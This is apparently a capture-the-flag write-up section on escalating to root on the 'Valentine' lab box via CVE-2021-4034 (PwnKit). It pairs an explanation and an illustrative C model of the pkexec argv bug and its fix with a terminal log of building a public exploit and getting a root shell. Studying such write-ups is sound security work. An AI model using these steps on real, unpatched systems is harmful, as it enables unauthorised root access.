CVE-2021-4034 (PwnKit):


PEAS reported that the target system is vulnerable to CVE-2021-4034. The vulnerable program, pkexec, is part of Polkit, the framework that controls how unprivileged processes obtain services from privileged ones. pkexec itself runs a command as another user (normally root) once Polkit has authorized the caller, so it fills a role similar to sudo and is installed setuid root.

The flaw is an out-of-bounds memory access that is triggered when pkexec is executed with no arguments at all (argc == 0, which execve() permits even though a shell never produces it). pkexec then reads argv[1], which in that layout is really the first environment string, resolves it as a program name through PATH, and writes the resolved path back to the same location. That write injects an environment variable that pkexec would otherwise have scrubbed, such as GCONV_PATH, and through it an attacker-controlled shared library is loaded and executed with root privileges.
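
The following is an added illustration of that root cause and is not pkexec's source or the exploit's code. It models the argv handling in C on a constructed process image: a single array holding argv, its NULL terminator and envp back to back, exactly as the kernel lays them out, so with argc == 0 the slot at argv[1] is envp[0]. The environment strings, the fake filesystem and the `find_program_in_path` stand-in for GLib's lookup are assumptions chosen to match the `GCONV_PATH=./pwnkit.so:.` path that the Makefile output above creates; the hardened variant follows the upstream fix (reject argc < 1, never write the resolved path back into argv).

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for the filesystem: paths that "exist and are executable".
 * The first one is what the Makefile above creates with cp -f /bin/true ... */
static const char *const fake_fs[] = { "GCONV_PATH=./pwnkit.so:.", "/bin/true", NULL };

/* Stand-in for GLib's g_find_program_in_path(): walk PATH and return a
 * heap-allocated "dir/name" for the first entry under which name exists. */
static char *find_program_in_path(const char *name, const char *path_var)
{
    char *copy = strdup(path_var), *save = NULL, *result = NULL;
    for (char *dir = strtok_r(copy, ":", &save); dir && !result;
         dir = strtok_r(NULL, ":", &save)) {
        size_t len = strlen(dir) + strlen(name) + 2;
        char *cand = malloc(len);
        snprintf(cand, len, "%s/%s", dir, name);
        for (int i = 0; fake_fs[i] && !result; i++)
            if (strcmp(cand, fake_fs[i]) == 0)
                result = cand;
        if (!result)
            free(cand);
    }
    free(copy);
    return result;
}

/* getenv() over an explicit envp array. */
static const char *env_lookup(char **envp, const char *key)
{
    size_t klen = strlen(key);
    for (int i = 0; envp[i]; i++)
        if (strncmp(envp[i], key, klen) == 0 && envp[i][klen] == '=')
            return envp[i] + klen + 1;
    return NULL;
}

/* Pre-fix logic modelled on pkexec's main(): options are parsed from argv[1],
 * argv[n] is then the program to run, and a relative name is resolved through
 * PATH with the result stored back into argv[n]. With argc == 0 the loop never
 * runs, n stays 1, and argv[1] is envp[0]: the read and the write are both OOB. */
int vulnerable_pkexec(int argc, char **argv, char **envp)
{
    int n;
    for (n = 1; n < argc && argv[n][0] == '-'; n++)
        ;                              /* model: anything not starting with '-' is the program */
    const char *path = argv[n];        /* out-of-bounds read when argc == 0 */
    if (path == NULL)
        return 1;                      /* real pkexec prints its usage here */
    if (path[0] != '/') {
        const char *path_var = env_lookup(envp, "PATH");
        char *s = path_var ? find_program_in_path(path, path_var) : NULL;
        if (s == NULL)
            return 1;                  /* "Cannot run program ...: No such file" */
        argv[n] = s;                   /* out-of-bounds write: lands on envp[0] */
    }
    return 0;
}

/* Hardened logic matching the upstream fix: refuse an empty argv (status 127)
 * and keep the resolved path in a local instead of writing it into argv. */
int fixed_pkexec(int argc, char **argv, char **envp)
{
    if (argc < 1)
        return 127;
    int n;
    for (n = 1; n < argc && argv[n][0] == '-'; n++)
        ;
    const char *path = argv[n];        /* n <= argc, so at worst this is the NULL terminator */
    if (path == NULL)
        return 1;
    char *resolved = NULL;
    if (path[0] != '/') {
        const char *path_var = env_lookup(envp, "PATH");
        resolved = path_var ? find_program_in_path(path, path_var) : NULL;
        if (resolved == NULL)
            return 1;
    }
    free(resolved);                    /* a real pkexec would now execve() it */
    return 0;
}

/* Build the image an exploit hands pkexec via execve(): argv == {NULL} and an
 * environment whose first entry is the name to resolve and whose PATH points at
 * the attacker-made directory (assumed values). Because argv and envp are
 * contiguous, envp == argv + 1 when argc == 0. Returns envp[0] afterwards. */
const char *run_with_empty_argv(int (*model)(int, char **, char **), int *rc)
{
    static char name[] = "pwnkit.so:.", path[] = "PATH=GCONV_PATH=.";
    static char *vec[4];
    vec[0] = NULL;                     /* argv[0] slot: with argc == 0 this is the terminator */
    vec[1] = name;                     /* envp[0] */
    vec[2] = path;                     /* envp[1] */
    vec[3] = NULL;
    char **argv = vec, **envp = vec + 1;
    *rc = model(0, argv, envp);
    return envp[0];
}

int main(void)
{
    int rc;
    const char *e = run_with_empty_argv(vulnerable_pkexec, &rc);
    printf("vulnerable: rc=%d envp[0]=\"%s\"\n", rc, e);
    e = run_with_empty_argv(fixed_pkexec, &rc);
    printf("fixed:      rc=%d envp[0]=\"%s\"\n", rc, e);
    return 0;
}
```

Running it shows the vulnerable model returning 0 with envp[0] rewritten to `GCONV_PATH=./pwnkit.so:.`, i.e. a GCONV_PATH variable now exists in pkexec's environment even though it was never passed in, while the fixed model returns 127 and leaves the environment untouched. In the real binary that injected variable is what makes glibc's charset conversion load the attacker's gconv module as root.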

I found an exploit online.

hype@valentine:/tmp/CVE-2021-4034$ make 
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
 
hype@valentine:/tmp/CVE-2021-4034$ ll
total 72
drwxr-xr-x 5 hype hype 4096 oct  8 11:57 ./
drwxrwxrwt 7 root root 4096 oct  8 11:58 ../
-rwxrwxr-x 1 hype hype 8387 oct  8 11:57 cve-2021-4034*
-rw-r--r-- 1 hype hype  292 oct  8 11:55 cve-2021-4034.c
-rwxr-xr-x 1 hype hype  305 oct  8 11:55 cve-2021-4034.sh*
drwxr-xr-x 2 hype hype 4096 oct  8 11:55 dry-run/
-rw-rw-r-- 1 hype hype   33 oct  8 11:57 gconv-modules
drwxrwxr-x 2 hype hype 4096 oct  8 11:57 GCONV_PATH=./
drwxr-xr-x 8 hype hype 4096 oct  8 11:55 .git/
-rw-r--r-- 1 hype hype  114 oct  8 11:55 .gitignore
-rw-r--r-- 1 hype hype 1071 oct  8 11:55 LICENSE
-rw-r--r-- 1 hype hype  469 oct  8 11:55 Makefile
-rw-r--r-- 1 hype hype  339 oct  8 11:55 pwnkit.c
-rwxrwxr-x 1 hype hype 8061 oct  8 11:57 pwnkit.so*
-rw-r--r-- 1 hype hype 3419 oct  8 11:55 README.md

I had already transferred the exploit package to the target system over TCP via Netcat; I then compiled the exploit. It created a binary, cve-2021-4034.

hype@valentine:/tmp/CVE-2021-4034$ ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),124(sambashare),1000(hype)
# whoami
root
# hostname 
Valentine
# ifconfig
eth0      link encap:Ethernet  HWaddr 00:50:56:b9:b4:d5  
          inet addr:10.10.10.79  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::75ff:5e08:88d0:c60d/64 Scope:Global
          inet6 addr: dead:beef::250:56ff:feb9:b4d5/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:b4d5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:237285 errors:0 dropped:322 overruns:0 frame:0
          TX packets:217362 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:38716739 (38.7 MB)  TX bytes:79324304 (79.3 MB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:11686 errors:0 dropped:0 overruns:0 frame:0
          TX packets:11686 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2617233 (2.6 MB)  TX bytes:2617233 (2.6 MB)

System-Level Compromise